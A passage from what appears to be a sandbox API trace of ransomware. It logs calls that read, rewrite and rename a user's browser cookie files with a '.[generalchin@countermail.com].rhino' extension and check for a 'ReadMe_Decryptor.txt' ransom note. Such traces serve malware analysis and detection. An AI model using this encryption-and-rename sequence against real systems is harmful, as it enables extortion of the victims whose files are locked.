hHeap=0x6d0000) returned 1 [0089.838] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0089.838] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.838] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0089.838] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0089.838] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0089.838] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0089.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0089.839] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0089.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0089.839] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0089.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0089.839] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0089.839] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0089.839] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0089.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b0208 [0089.839] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0089.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b0498 [0089.839] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0208 | out: hHeap=0x6d0000) returned 1 [0089.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x230) returned 0x23b05e0 [0089.839] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0498 | out: hHeap=0x6d0000) returned 1 [0089.839] WriteFile (in: hFile=0x104, lpBuffer=0x23b05e0*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b05e0*, lpNumberOfBytesWritten=0x2cfa04*=0x230, lpOverlapped=0x0) returned 1 [0089.840] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b05e0 | out: hHeap=0x6d0000) returned 1 [0089.840] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x230, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0089.840] CloseHandle (hObject=0x104) returned 1 [0089.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x23b0208 [0089.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x166) returned 0x23b0498 [0089.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0208 | out: hHeap=0x6d0000) returned 1 [0089.841] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0089.842] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0498 | out: hHeap=0x6d0000) returned 1 [0089.842] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0310 | out: hHeap=0x6d0000) returned 1 [0089.842] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.842] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0089.842] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0089.842] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0089.842] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0089.842] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0089.842] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.842] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.842] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0089.888] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x76 [0089.888] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x196, nNumberOfBytesToLockHigh=0x0) returned 1 [0089.888] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.889] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0089.891] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.891] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x76, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x76, lpOverlapped=0x0) returned 1 [0089.891] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0089.891] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.891] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0089.892] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0089.892] GetLastError () returned 0x0 [0089.892] SetLastError (dwErrCode=0x0) [0089.892] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.892] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x76) returned 0x6e1368 [0089.892] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.892] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0198 [0089.892] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b02a0 [0089.892] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.892] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.892] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0089.892] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0089.892] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.892] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0089.892] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.892] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0089.892] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.893] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0089.893] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.893] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0089.893] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.893] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0089.893] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0089.893] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0089.893] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0089.893] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0089.893] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0089.893] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0089.893] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0089.893] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0089.893] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.893] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0089.893] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.893] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0089.893] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0089.893] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x196) returned 0x23b0428 [0089.893] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0089.894] WriteFile (in: hFile=0xec, lpBuffer=0x23b0428*, nNumberOfBytesToWrite=0x196, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0428*, lpNumberOfBytesWritten=0x2cfa04*=0x196, lpOverlapped=0x0) returned 1 [0089.894] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0428 | out: hHeap=0x6d0000) returned 1 [0089.894] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x196, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0089.894] CloseHandle (hObject=0xec) returned 1 [0089.895] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x23b0198 [0089.895] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x166) returned 0x23b0428 [0089.895] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.896] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0089.896] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0428 | out: hHeap=0x6d0000) returned 1 [0089.896] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02a0 | out: hHeap=0x6d0000) returned 1 [0089.896] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e1368 | out: hHeap=0x6d0000) returned 1 [0089.897] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0089.897] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.897] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0089.897] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0089.897] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.897] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.897] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.897] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@msn[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0089.897] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x337 [0089.897] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x457, nNumberOfBytesToLockHigh=0x0) returned 1 [0089.898] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.898] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0089.910] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.911] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x337, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x337, lpOverlapped=0x0) returned 1 [0089.911] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0089.911] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.911] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0089.911] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0089.911] GetLastError () returned 0x0 [0089.911] SetLastError (dwErrCode=0x0) [0089.911] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.911] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x337) returned 0x23b00f0 [0089.912] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.912] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0430 [0089.912] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0538 [0089.912] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0430 | out: hHeap=0x6d0000) returned 1 [0089.912] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.912] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0089.912] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0089.912] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.912] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0089.912] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.912] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0089.912] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.912] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0089.912] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.912] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0089.912] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.912] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0089.912] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0089.912] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0089.913] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0089.913] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0089.913] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0089.913] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0089.913] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0089.913] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0089.913] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.913] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0089.913] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.913] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0089.913] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0089.913] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b0430 [0089.913] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0089.913] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b06c0 [0089.913] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0430 | out: hHeap=0x6d0000) returned 1 [0089.913] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x23b0808 [0089.913] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b06c0 | out: hHeap=0x6d0000) returned 1 [0089.913] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23b09f0 [0089.914] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0808 | out: hHeap=0x6d0000) returned 1 [0089.914] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75ef78 [0089.914] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b09f0 | out: hHeap=0x6d0000) returned 1 [0089.914] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x23b06c0 [0089.914] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0089.914] WriteFile (in: hFile=0xec, lpBuffer=0x23b06c0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b06c0*, lpNumberOfBytesWritten=0x2cfa04*=0x457, lpOverlapped=0x0) returned 1 [0089.914] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b06c0 | out: hHeap=0x6d0000) returned 1 [0089.914] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x457, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0089.914] CloseHandle (hObject=0xec) returned 1 [0089.915] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0089.915] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x23b06c0 [0089.915] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0089.916] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@msn[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@msn[1].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0089.916] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b06c0 | out: hHeap=0x6d0000) returned 1 [0089.917] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0538 | out: hHeap=0x6d0000) returned 1 [0089.917] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.917] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0089.917] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0089.917] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0089.917] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0089.917] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0089.917] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.917] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.917] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0089.918] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xce [0089.918] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1ee, nNumberOfBytesToLockHigh=0x0) returned 1 [0089.919] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.919] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0089.920] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.921] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xce, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: 